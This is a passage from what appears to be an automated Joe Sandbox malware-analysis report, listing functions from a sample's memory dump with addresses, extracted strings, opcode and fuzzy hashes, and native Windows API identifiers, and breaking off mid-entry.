                                                                                            • Opcode ID: 262c1f5e10b1fa17d9f9cf2dffbf19d428c848889dbd6813eb4c294175b6bb3a
                                                                                            • Instruction ID: 4f5f464e3adda9499493ea29ab5bf37e872dc5f107be996e50c02bc0edd5948e
                                                                                            • Opcode Fuzzy Hash: 262c1f5e10b1fa17d9f9cf2dffbf19d428c848889dbd6813eb4c294175b6bb3a
                                                                                            • Instruction Fuzzy Hash: CE810822B5A54B8FFB9C9729885527D62CBEBD9250F55817DE00ECB3D1FD38EC0A4680
                                                                                            Function 00007FFAAC52749E Relevance: 3.6, Strings: 2, Instructions: 1123COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 286$[X~$
                                                                                            • API String ID: 0-741886506
                                                                                            • Opcode ID: d1bd93ed21a545215d725be5e7f8edca234adffe5bde79840579261cd4190d13
                                                                                            • Instruction ID: 15e92ff4b30074ed3b0def477c71c709c145f840f22710a16dad2746ceb426c1
                                                                                            • Opcode Fuzzy Hash: d1bd93ed21a545215d725be5e7f8edca234adffe5bde79840579261cd4190d13
                                                                                            • Instruction Fuzzy Hash: CA923DB291E7958FE375DB28C4469AA77D1EF95300F0409ADF48D8B292DE34E805C7C2
                                                                                            Function 00007FFAAC5383F8 Relevance: 3.2, Strings: 2, Instructions: 729COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (P"$(P"
                                                                                            • API String ID: 0-373186703
                                                                                            • Opcode ID: 54dffc625c7a70f0e8da90d891e685c4ba8003da9f25c21e3d0a08eb9f16a4de
                                                                                            • Instruction ID: e2c5c2888dc278412bc90286db30745f29111b8b9364351a25a22511873a4011
                                                                                            • Opcode Fuzzy Hash: 54dffc625c7a70f0e8da90d891e685c4ba8003da9f25c21e3d0a08eb9f16a4de
                                                                                            • Instruction Fuzzy Hash: F432FF7095DA0A8FE719DB18C4A49B573E1FF95304B208A7DE08F87796DA35F84AC780
                                                                                            Function 00007FFAAC53B618 Relevance: 3.2, Strings: 2, Instructions: 668COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: b4$d
                                                                                            • API String ID: 0-2243634771
                                                                                            • Opcode ID: 6fbfbc80007546de252b2881e945d476ad617a01aaf9965b8ea520eed1875ad7
                                                                                            • Instruction ID: bb6f3daa48f378277f105e478372d8bb3ef08567cdb71daefbd3927ccb0265fc
                                                                                            • Opcode Fuzzy Hash: 6fbfbc80007546de252b2881e945d476ad617a01aaf9965b8ea520eed1875ad7
                                                                                            • Instruction Fuzzy Hash: F2125431A59A468FE31DDB28C465471B7E6EB97304B1486BEE48FC7297CE24F8078781
                                                                                            Function 00007FFAAC530D7D Relevance: 2.9, Strings: 2, Instructions: 378COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A$p]
                                                                                            • API String ID: 0-418350652
                                                                                            • Opcode ID: f1fd690682c036540f8201f9b8379955d9e21c0d97b70733bfb5b4ebf9b2239e
                                                                                            • Instruction ID: 03a7e582b6f5d4fe869f1f045e6d207466e06258f1cd620aa4d33a40fb88e63e
                                                                                            • Opcode Fuzzy Hash: f1fd690682c036540f8201f9b8379955d9e21c0d97b70733bfb5b4ebf9b2239e
                                                                                            • Instruction Fuzzy Hash: 81B12732E5962A8BFB5CD62C845567873D6EB99310F0582BDE88FD3392DD24EC4687C0
                                                                                            Function 00007FFAAC54B628 Relevance: 2.7, Instructions: 2680COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93bf971515b95bd653b1477042b785bf93bb522ff944b7a2cd36787f228071a8
                                                                                            • Instruction ID: 4e773791343f696a05f6ce61c47c42fe3f822ce8e2b8e7e161d9cb5a20e18667
                                                                                            • Opcode Fuzzy Hash: 93bf971515b95bd653b1477042b785bf93bb522ff944b7a2cd36787f228071a8
                                                                                            • Instruction Fuzzy Hash: F5038521B6991A8FF348AB6CD8A567873D6EB59740F4085FDF40EC33E7CD14AC468682
                                                                                            Function 00007FFAAC528034 Relevance: 2.2, Strings: 1, Instructions: 951COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #;<G
                                                                                            • API String ID: 0-548829297
                                                                                            • Opcode ID: e9f7af21d5daa1fcaf28940a40ed59fb2e2582aafddb04e2876dd4e7f57d68cb
                                                                                            • Instruction ID: 96e9ccac8e93ca4a307b5a050b718b900ca2a992250eb9bde7eac522855c045f
                                                                                            • Opcode Fuzzy Hash: e9f7af21d5daa1fcaf28940a40ed59fb2e2582aafddb04e2876dd4e7f57d68cb
                                                                                            • Instruction Fuzzy Hash: 33722D7291E7928FE7659B28C445AEA77D1EF95300F0105BDE48D8B2D2EE34AC45C7C2
                                                                                            Function 00007FFAAC542400 Relevance: 2.1, Strings: 1, Instructions: 881COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: r6
                                                                                            • API String ID: 0-2984296541
                                                                                            • Opcode ID: 58966d524b5a8438e324affcc76e7f3ea5550199f92ee9a12e15444a7bf3a539
                                                                                            • Instruction ID: e33f9989846826fca44befb18e4b12f8e328e5aad9e9540c2bead516715adb02
                                                                                            • Opcode Fuzzy Hash: 58966d524b5a8438e324affcc76e7f3ea5550199f92ee9a12e15444a7bf3a539
                                                                                            • Instruction Fuzzy Hash: 8E626030959A0DCFDB98EB28C498A6577E1FF55304B5485ADE04FCB1A2DB36EC46CB80
                                                                                            Function 00007FFAAC526C07 Relevance: 2.1, Strings: 1, Instructions: 871COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: j2J
                                                                                            • API String ID: 0-3209675307
                                                                                            • Opcode ID: 4987f09c6df9cda4fd47b3d508130aa8860324e64feb7c73109ffadc3a0a78fb
                                                                                            • Instruction ID: 4f0982e05efe6e79cc4ac6a302bb483e00386be89ae3bda6cca84336022a3016
                                                                                            • Opcode Fuzzy Hash: 4987f09c6df9cda4fd47b3d508130aa8860324e64feb7c73109ffadc3a0a78fb
                                                                                            • Instruction Fuzzy Hash: 4F6228B2A1E7968FE774DB28C446AAA77D1EF95300F01056DE08D87292EE34E845C7C6
                                                                                            Function 00007FFAAC5431E0 Relevance: 1.8, APIs: 1, Instructions: 262COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 099d01c6fca552124f1c2ab2bde21c7bc1c55217f987aa464dc3235306570126
                                                                                            • Instruction ID: b61617477f5176407f90de82f33ad002faa4823bd259603683dce73e531fcb08
                                                                                            • Opcode Fuzzy Hash: 099d01c6fca552124f1c2ab2bde21c7bc1c55217f987aa464dc3235306570126
                                                                                            • Instruction Fuzzy Hash: 1081A571908A1D8FEB98DB58D845BE977F1FB59310F1082AAD40ED3252DE34A989CFC1
                                                                                            Function 00007FFAAC520918 Relevance: 1.7, Strings: 1, Instructions: 493COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :j2P
                                                                                            • API String ID: 0-2106166442
                                                                                            • Opcode ID: 91ccf67c752fc3210ba20e71511721da72f3828164a5b59ea5b06dcd8c61181c
                                                                                            • Instruction ID: e4b4c545f7e6c5012f00f736f4d43f36c0edb5d586584ba3b57565af29594bbf
                                                                                            • Opcode Fuzzy Hash: 91ccf67c752fc3210ba20e71511721da72f3828164a5b59ea5b06dcd8c61181c
                                                                                            • Instruction Fuzzy Hash: DED1F171A6D74A8BE31C972C884717577D9EB8A304F14857DE98FC7297ED18E80782C2
                                                                                            Function 00007FFAAC52E206 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0W
                                                                                            • API String ID: 0-1461859783
                                                                                            • Opcode ID: 4fa2ae6d631439d4c1f15cdedb1711a0a272354d9add3a7ce77801df2f119867
                                                                                            • Instruction ID: 57efeea10eac6de93eabf9007ec18c2aec1257ce6f3a02c7599ea32034a8a1b3
                                                                                            • Opcode Fuzzy Hash: 4fa2ae6d631439d4c1f15cdedb1711a0a272354d9add3a7ce77801df2f119867
                                                                                            • Instruction Fuzzy Hash: A9D12A31749A4A8FF758E72D985913877D6EF9A21170941BAE00ECB3E2ED14EC4AC780
                                                                                            Function 00007FFAAC537410 Relevance: 1.7, APIs: 1, Instructions: 176nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: SectionView
                                                                                            • String ID:
                                                                                            • API String ID: 1323581903-0
                                                                                            • Opcode ID: 6ce05990b2233ac30e1e1dc0f8d92d0d8f1da544e746febaa0bda4e10a684002
                                                                                            • Instruction ID: f038056b0137f40a199d4be7f8103b0798093df94ebad3f442c01d6304ecd6eb
                                                                                            • Opcode Fuzzy Hash: 6ce05990b2233ac30e1e1dc0f8d92d0d8f1da544e746febaa0bda4e10a684002
                                                                                            • Instruction Fuzzy Hash: B3519E7191CB4C8FDB28DF58D8466ADBBF1FB99320F10426EE049D3256CB70A8458BC2
                                                                                            Function 00007FFAAC5293BD Relevance: 1.7, Strings: 1, Instructions: 411COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 7)
                                                                                            • API String ID: 0-3372029826
                                                                                            • Opcode ID: 5ba9643bbdf9b402a148101fe1017d009e458bc25a5c63f705ca381949ce0a5d
                                                                                            • Instruction ID: 3c7c184226f9e7c607fd7ea3f04871612c835942841ee0a2e90df540104e8bae
                                                                                            • Opcode Fuzzy Hash: 5ba9643bbdf9b402a148101fe1017d009e458bc25a5c63f705ca381949ce0a5d
                                                                                            • Instruction Fuzzy Hash: 6FF10970E0A50D9FEB58DF98E5956ACB7F2FF59300F24516AE00AE7391DA34AE05CB40
                                                                                            Function 00007FFAAC5371B1 Relevance: 1.7, APIs: 1, Instructions: 160nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateSection
                                                                                            • String ID:
                                                                                            • API String ID: 2449625523-0
                                                                                            • Opcode ID: f4425a91f687aa87ad54c54443c34747567f064b32d202d8511dcaf69a400dc4
                                                                                            • Instruction ID: bd08920db0b35725f7b27e908a5937c726bc017a11b61e4a41f93d62413bd25b
                                                                                            • Opcode Fuzzy Hash: f4425a91f687aa87ad54c54443c34747567f064b32d202d8511dcaf69a400dc4
                                                                                            • Instruction Fuzzy Hash: E141B47190CB4C8FDB58DF58D845AED7BE1EB99321F04426FE44ED3252CA74A8458BC2
                                                                                            Function 00007FFAAC5376A8 Relevance: 1.7, APIs: 1, Instructions: 158filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: ControlDeviceFile
                                                                                            • String ID:
                                                                                            • API String ID: 3512290074-0
                                                                                            • Opcode ID: 2be6333f64192a376397da83f3b6c7c8a573e3ba6b670cf6bbd077cb6ce840e1
                                                                                            • Instruction ID: a19c720f2a097b2b1f8138b0ece1b37d417235c2a656663e4c841e485480967d
                                                                                            • Opcode Fuzzy Hash: 2be6333f64192a376397da83f3b6c7c8a573e3ba6b670cf6bbd077cb6ce840e1
                                                                                            • Instruction Fuzzy Hash: 8641A07191CB4C8FDB58EF58D845AED7BE1FBA9320F04426EE449D3252CB74A8458BC2
                                                                                            Function 00007FFAAC53706D Relevance: 1.6, APIs: 1, Instructions: 150filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileOpen
                                                                                            • String ID:
                                                                                            • API String ID: 2669468079-0
                                                                                            • Opcode ID: d7d101417485482090ca13c2d13205c912069a20919f56a6039ed96942aa4761
                                                                                            • Instruction ID: 4e184b14773307a45d8b046cb31e6aff8c01dec1250c0a9b31eb1e419bd82de7
                                                                                            • Opcode Fuzzy Hash: d7d101417485482090ca13c2d13205c912069a20919f56a6039ed96942aa4761
                                                                                            • Instruction Fuzzy Hash: DF41B67190CB5C8FDB18DF68D8456FD7BE1EB99321F0442AFE04ED3252CA74A8458B82
                                                                                            Function 00007FFAAC536AC8 Relevance: 1.6, APIs: 1, Instructions: 142nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2706961497-0
                                                                                            • Opcode ID: 28531cb548b3e631c52d54826835f12347532645711a49fccd4430279478ee3d
                                                                                            • Instruction ID: 7af11d82fa99aff7829740b71d0384c3e89f4eaab020a028a969f18f20b92f79
                                                                                            • Opcode Fuzzy Hash: 28531cb548b3e631c52d54826835f12347532645711a49fccd4430279478ee3d
                                                                                            • Instruction Fuzzy Hash: F741B67190CB488FDB18DB5CD8566ED7BE1EB99320F00826FE04ED3292CE74A8458BC1
                                                                                            Function 00007FFAAC536BF9 Relevance: 1.6, APIs: 1, Instructions: 142memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: ee113c61fefe028553792b3f09e74a17549173502cbe95770dbe663e510708cd
                                                                                            • Instruction ID: 821ba00c2747ce8745532bb6135d93790b158c7eafd8f209cc3eacc8c756f8cb
                                                                                            • Opcode Fuzzy Hash: ee113c61fefe028553792b3f09e74a17549173502cbe95770dbe663e510708cd
                                                                                            • Instruction Fuzzy Hash: 8741927190CB4C8FDB19DFA8D8556ED7BE1EF95321F04426FE04DD3292CA74A8458B82
                                                                                            Function 00007FFAAC537599 Relevance: 1.6, APIs: 1, Instructions: 131filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInformationQueryVolume
                                                                                            • String ID:
                                                                                            • API String ID: 634242254-0
                                                                                            • Opcode ID: 679525f26dc6fc9f8674bdf18b99e235ae1dcbf2a52767c59602e9da219da5d0
                                                                                            • Instruction ID: 48a86f456fcf1bd20d0edc0ca9380d5ed5f355667447c906d147eb3b4567e0af
                                                                                            • Opcode Fuzzy Hash: 679525f26dc6fc9f8674bdf18b99e235ae1dcbf2a52767c59602e9da219da5d0
                                                                                            • Instruction Fuzzy Hash: D541F67190CB4C8FDB199B68D8556F97BE1EF56310F04426FE04AC3292CB74A4568792
                                                                                            Function 00007FFAAC536E48 Relevance: 1.6, APIs: 1, Instructions: 113nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: SectionUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 498011366-0
                                                                                            • Opcode ID: c36d9afaac934ae668aa070686286623ae64f352a8ab2c00441febdb16720906
                                                                                            • Instruction ID: cb84d8f7928f88fcd96241fa986c6f6dd2360f8142508691c3419d61c13620fc
                                                                                            • Opcode Fuzzy Hash: c36d9afaac934ae668aa070686286623ae64f352a8ab2c00441febdb16720906
                                                                                            • Instruction Fuzzy Hash: 1531DB7190CB488FEB29DBA8D8166F97BE1EB56321F00416FD04EC3292DE64A405CB91
                                                                                            Function 00007FFAAC5369E4 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 2e1d7bb0b654a12f426e34ab4a8870c17aef72e4195768f89dcede44e00bc6fa
                                                                                            • Instruction ID: fc245b5dfa22bfdc9a4e028dd505a97b9dbd919aa27380e7a27a8eeb1d47ef12
                                                                                            • Opcode Fuzzy Hash: 2e1d7bb0b654a12f426e34ab4a8870c17aef72e4195768f89dcede44e00bc6fa
                                                                                            • Instruction Fuzzy Hash: 3431F77190C64C8FEB59DBA884567FD7BE1EF56321F04826FD04EC3292DA74A405CB91
                                                                                            Function 00007FFAAC52A791 Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :j2P
                                                                                            • API String ID: 0-2106166442
                                                                                            • Opcode ID: a89057c46fc6e685383672b3ea747fbaa7f0415e94d86e1133899e51aeb47afe
                                                                                            • Instruction ID: 1f2d8922c685979795bb2e0a59bb0e8cf4d7e923528d9d2f7fcc6a7758472339
                                                                                            • Opcode Fuzzy Hash: a89057c46fc6e685383672b3ea747fbaa7f0415e94d86e1133899e51aeb47afe
                                                                                            • Instruction Fuzzy Hash: 96810461AAD7464FE31C963C58071357ADAEB86200B14D27DF9CFCB297F918E81782C2
                                                                                            Function 00007FFAAC520720 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2'E
                                                                                            • API String ID: 0-101737470
                                                                                            • Opcode ID: 53ac70e73630c8d582eed9303855e7225f946f94159d93daf0d44acdc29122c2
                                                                                            • Instruction ID: 79499b0c9072c638fe68d0f65a3244804cd600c7640d673d0713d079bd61eea5
                                                                                            • Opcode Fuzzy Hash: 53ac70e73630c8d582eed9303855e7225f946f94159d93daf0d44acdc29122c2
                                                                                            • Instruction Fuzzy Hash: 5C910131A5A70ACFF358AB38845527576D6EF82300F508579E80ECB793ED29EC4AC780
                                                                                            Function 00007FFAAC5215C5 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A==>
                                                                                            • API String ID: 0-2245444498
                                                                                            • Opcode ID: 31529e0e4876573183214073b2cf076b13d9bb17a392a922168c7c80bbc2995b
                                                                                            • Instruction ID: 8ffb1ba0e0127f58d98af265bd4c7933b2369f8e7e15d0554b86c4f8f927aab9
                                                                                            • Opcode Fuzzy Hash: 31529e0e4876573183214073b2cf076b13d9bb17a392a922168c7c80bbc2995b
                                                                                            • Instruction Fuzzy Hash: 7691E3B2A1AA468FF6A4DB18C4459BA73D2EFD4300F044579E44EC7296EE31EC4587C1
                                                                                            Function 00007FFAAC52A801 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :j2P
                                                                                            • API String ID: 0-2106166442
                                                                                            • Opcode ID: 5861e7dda319902090c008b143ba9af215735b3b22734ba7b0e9d7f686d54d5a
                                                                                            • Instruction ID: 467c9313d1c7e0f8f80e12938284a72e9b37929562ad3df5d1f10c24441ad550
                                                                                            • Opcode Fuzzy Hash: 5861e7dda319902090c008b143ba9af215735b3b22734ba7b0e9d7f686d54d5a
                                                                                            • Instruction Fuzzy Hash: 4B611361AAD74B4BA31C962C4C4713536DAEB8A204B64D13DF9CFDB296F918E81342C7
                                                                                            Function 00007FFAAC534BE9 Relevance: .4, Instructions: 392COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 897d0bfc1c0e1e6d116c7f56cb5be1727d171d1802c8fb2ecb7ca5dd4df555aa
                                                                                            • Instruction ID: 221efd7eb52390104b87b130e7393cc7a15fea64f79ef7ffc8e601d1b0025f50
                                                                                            • Opcode Fuzzy Hash: 897d0bfc1c0e1e6d116c7f56cb5be1727d171d1802c8fb2ecb7ca5dd4df555aa
                                                                                            • Instruction Fuzzy Hash: 11B16B3264EA4A8FF795D73C88A55743BD6EF9631070585BAE04DC7292DE38DC0AC391
                                                                                            Function 00007FFAAC528A6A Relevance: .4, Instructions: 376COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d654a4115643cb8c10c599221b8a574be8d32ec798357c20d9d5372b760152c5
                                                                                            • Instruction ID: 21a672da00a53166c8d6c451c9b56f104f0e5fa5ff28eeb6242b82c99d797326
                                                                                            • Opcode Fuzzy Hash: d654a4115643cb8c10c599221b8a574be8d32ec798357c20d9d5372b760152c5
                                                                                            • Instruction Fuzzy Hash: 5ED1B5B2A5A7868FE768DB28C44596A77D2EFD5300F044979E04EC7292EE34EC4587C2
                                                                                            Function 00007FFAAC52384B Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
